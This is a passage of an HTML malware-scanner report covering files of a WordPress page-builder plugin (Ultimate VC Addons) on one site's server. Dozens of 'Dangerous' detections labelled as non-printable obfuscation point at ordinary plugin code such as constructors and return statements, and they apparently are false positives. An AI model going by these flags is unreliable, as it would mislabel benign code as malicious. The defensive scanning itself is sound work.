</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ultimate_get_icon_position_json'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_get_icon_position_json</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 49</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'ultimate_get_animation_json'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ultimate_get_animation_json</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_295").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_info_list.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 38.74 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 15</span><br><table id="file_296" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$AIO_Info_list</span><span style="color: #007700">-></span><span style="color: #0000BB">front_info_list_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">); } } } } if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'AIO_Info_list'</span><span style="color: #007700">)) { </span><span style="color: #0000BB">$AIO_Info_list </span><span style="color: #007700">= new </span><span style="color: #0000BB">AIO_Info_list</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_list_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 28</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_is_inline'</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions </span><span style="color: #007700">for </span><span style="color: #0000BB">frontend editor</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 324</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_info_list</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 38</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">info_list</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 413</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">front_info_list_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 470</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_info_list</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 945</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">content</span><span style="color: #007700">( </span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 947</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$AIO_Info_list</span><span style="color: #007700">-></span><span style="color: #0000BB">front_info_list</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">content</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 955</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$AIO_Info_list</span><span style="color: #007700">-></span><span style="color: #0000BB">front_info_list_item</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_296").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_ihover.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 42.46 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 11</span><br><table id="file_297" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_scripts</span><span style="color: #007700">() { </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_style</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_ihover_css'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ihover' </span><span style="color: #007700">); </span><span style="color: #0000BB">Ultimate_VC_Addons</span><span style="color: #007700">::</span><span style="color: #0000BB">ultimate_register_script</span><span style="color: #007700">( </span><span style="color: #DD0000">'ult_ihover_js'</span><span style="color: #007700">, </span><span style="color: #DD0000">'ihover'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, array( </span><span style="color: #DD0000">'jquery' </span><span style="color: #007700">), </span><span style="color: #0000BB">ULTIMATE_VERSION</span><span style="color: #007700">, </span><span style="color: #0000BB">true </span><span style="color: #007700">); } } new </span><span style="color: #0000BB">ULT_iHover</span><span style="color: #007700">; if ( </span><span style="color: #0000BB">class_exis</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 387</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$itemOutput</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 390</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">commonStructure</span><span style="color: #007700">(</span><span style="color: #0000BB">$desc_responsive</span><span style="color: #007700">, </span><span style="color: #0000BB">$title_responsive</span><span style="color: #007700">, </span><span style="color: #0000BB">$heading_block</span><span style="color: #007700">, </span><span style="color: #0000BB">$title_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$heading_tag</span><span style="color: #007700">, </span><span style="color: #0000BB">$spacer_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$spacer_line_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$description_block</span><span style="color: #007700">, </span><span style="color: #0000BB">$desc_style</span><span style="color: #007700">, </span><span style="color: #0000BB">$content</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$itemOutput</span><span style="color: #007700">; </span><span style="color: #FF8000">//ob_get_clean();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 415</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_init</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">"vc_map"</span><span style="color: #007700">)){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 89</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_item_callback</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">, </span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 995</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">ult_ihover_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_297").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_google_trends.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 10.61 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 6</span><br><table id="file_298" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } new </span><span style="color: #0000BB">Ultimate_Google_Trends</span><span style="color: #007700">; if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode'</span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode_ultimate_google_trends'</span><span style="color: #007700">)) { class </span><span style="color: #0000BB">WPBakeryShortCode_ultimate_google_trends </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 14</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">google_trends_init</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_ultimate_trends</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">,</span><span style="color: #0000BB">$content </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 245</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 8</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_298").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_countdown.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 26.36 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 9</span><br><table id="file_299" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">; } } </span><span style="color: #0000BB">$ult_countdown </span><span style="color: #007700">= new </span><span style="color: #0000BB">Ultimate_CountDown</span><span style="color: #007700">; if(</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode'</span><span style="color: #007700">) && !</span><span style="color: #0000BB">class_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'WPBakeryShortCode_ult_countdown'</span><span style="color: #007700">)) { class </span><span style="color: #0000BB">WPBakeryShortCode_ult_countdown </span><span style="color: #007700">extends </span><span style="color: #0000BB">WPBakeryShortCode </span><span style="color: #007700">{ } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">count_down_scripts</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_scripts</span><span style="color: #007700">(</span><span style="color: #0000BB">$hook</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 37</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">countdown_init</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'vc_map'</span><span style="color: #007700">))</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">icon block</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">countdown_shortcode</span><span style="color: #007700">(</span><span style="color: #0000BB">$atts</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 641</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$output</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_299").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/_Ultimate_VC_Addons/modules/ultimate_image_separator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 12.65 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:33</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 8</span><br><table id="file_300" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
